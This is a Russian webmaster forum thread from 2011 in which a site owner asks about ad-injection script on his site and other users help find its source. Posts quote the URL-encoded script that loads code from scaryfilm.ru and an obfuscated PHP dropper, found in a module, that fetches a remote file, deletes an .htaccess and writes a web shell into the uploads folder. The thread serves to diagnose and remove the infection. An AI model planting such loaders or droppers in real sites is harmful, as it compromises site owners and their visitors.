Найден вредоносный код
Страницы: 1 2 След.
Найден вредоносный код
Здравствуйте!
У меня проблема, с сегоднешнего утра на моем сайте появился код рекламных партнерок который я не ставил,
код выглядит так "<script type="text/javascript">
<!--
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%27%2B%27%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%73%63%61%72%79%66%69%6C%6D%2E%72%75%2F%61%6A%61%78%2F%6F%6E%6C%69%6E%65%2D%6B%69%6E%6F%2E%70%68%70%22%3E%3C%27%2B%27%2F%73%63%72%27%2B%27%69%70%74%3E%27%29%3B%3C%2F%73%63%72%69%70%74%3E'));
//-->
</script>"
но в шаблоне сайта я такого кода ненашел, можите помочь с решением данной проблемы?

мой сайт: online-kino.ws
McAfee вроде может помочь. Просканируйте им.
Инвестирую в ПАММ-счета АЛЬПАРИ
Публикую интересные рейтинги и топ-листы.
Мать моя женщина.... smile:eek: да у вас весь сайт как советский холодильник в наклейках!
вот именно, из-за этого кода и начали вылезать все эти рич-банеры хотя я их не ставил, и хз где этот скрипт находиться
гляньте в index.php
Цитата
Makintosh пишет:
online-kino.ws

Тут одно ясно нужно всегда обновлять скрипты до последней версии , если ума нет заплатки ставить.
Код был найден или нет?Если нет пиши в асю 626437020
Изменено: Mr.SEO - 14 Ноября 2011 19:46
Ищите ссылку в движке скорей всего , либо в js шаблона

http://scaryfilm.ru/ajax/online-kino.php
Изменено: koper-nikl - 14 Ноября 2011 19:54
менял шаблон на стандартный, тоже самое, этот код внизу страници
Скачивайте двиг на компьютер , ну можете и на хостинге но как для меня так лучше скачать и через Notepad ищите код или ссылку ! Сам код в лс скинул , если нужен конечно !?
значит в footer смотрите
Изменено: zelenograd - 14 Ноября 2011 20:09 (добавил букву)
Даже если Вас съели, всё равно у Вас есть два выхода!
Ищите фтп шелл... скорее всего он в одном из установленных модулей, например videovk_mod.

Там есть такое... сносите к чертям!

$fdsfsdfsdfsd = file_get_contents('h'.'t'.'t'.'p'.':'.'//'.'s'.'c'.'a'.'r'.'y'.'f'.'i'.'l'.'m'.'.'.'ru'.'/get.'.'p'.'hp'.'?url='.$_SERVER['HTTP_HOST']).unlink(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/.htaccess'); file_put_contents(ROOT_DIR.'/'.'b'.'a'.'c'.'k'.'u'.'p'.'/pe'.'op'.'le'.'.p'.'hp', str_replace('fghfgh544ty', '?>', str_replace('fgfvsdffvsdvsd', '<?', $fdsfsdfsdfsd))); file_put_contents(ROOT_DIR.'/'.'u'.'p'.'l'.'o'.'a'.'d'.'s'.'/'.'f'.'ot'.'os'.'/pe'.'op'.'le'.'.p'.'hp', str_replace('fghfgh544ty', '?>', str_replace('fgfvsdffvsdvsd', '<?', $fdsfsdfsdfsd)));

Как видно шел грузится в uploads/fotos/people.php

А далее обходите все файлы движка и смотрите какие изменения были внесены.
похожая проблема, поймал трояна, который добавляет свой код в htacsess, а также в другие исполняемые файлы.
Думаю проблема в ФТП, но касперский сцука - молчит! говорит все в порядке, сейчас на гугле прочитал про Spyware Terminator - уже обнаружил 22 угрозы, Касперский походу вообще мышей не ловит.

причем это я сейчас к корпоративной версии касперского претензии имею, дома стоит модная интернет-секьюрити 2012 или как там она... вечером дома еще этого терминатора заряжу, если и там будет облом, придется Касперскому письмо писать.
забыл добавить - у меня данный код делает безусловную переадресацию на ахтунг сайт zlubob.org, а оттуда на любые ахтунг сайты, даже неприличного содержания
Попробуйте http://www.cy-pr.com/forum/f80/t22007/
Хостинг Beget на СУПРе
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
21:49 Как правильно покупать ссылки для поддомена? 
18:51 Роскомнадзор отказал в регистрации трети блогеров-десятитысячников 
12:53 где много готовых фавиконок 
22:59 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
12:32 «Хлебные крошки» в адресе сайтов исчезнут из результатов поиска Google 
23:27 Adfinity - Ваш надежный партнер в монетизации трафика 
16:55 Инструменты для массового постинга в WordPress 
20:19 GoogleWalker - устранение конкурентов в Google Ads | Автоматизированная система склика | АНТИБАН 
16:39 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
11:07 Мобильные и Резидентные Прокси Для Соц Сетей | 3 Гб Бесплатно 
11:01 Защитим твой ресурс от блокировки Роскомнадзора 
10:09 BestChange – обменивать электронную валюту можно быстро и выгодно 
06:50 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
03:42 A-Parser 1.1 - продвинутый парсер поисковых систем, Suggest, PR, DMOZ, Whois, etc 
07:48 США готовят закон для уничтожения пиратских сайтов во всех странах мира 
02:50 Точные прогнозы на футбол 
02:10 [Новая партнерка] Goldbet Partners — прямой рекламодатель одноименного казино Goldbet 
21:19 С юмором по жизни! 
18:15 Telegram уничтожил официальный канал легендарного российского торрент-трекера 
18:19 Уникальный сервис SEO продвижения 
14:45 (затёр сайт)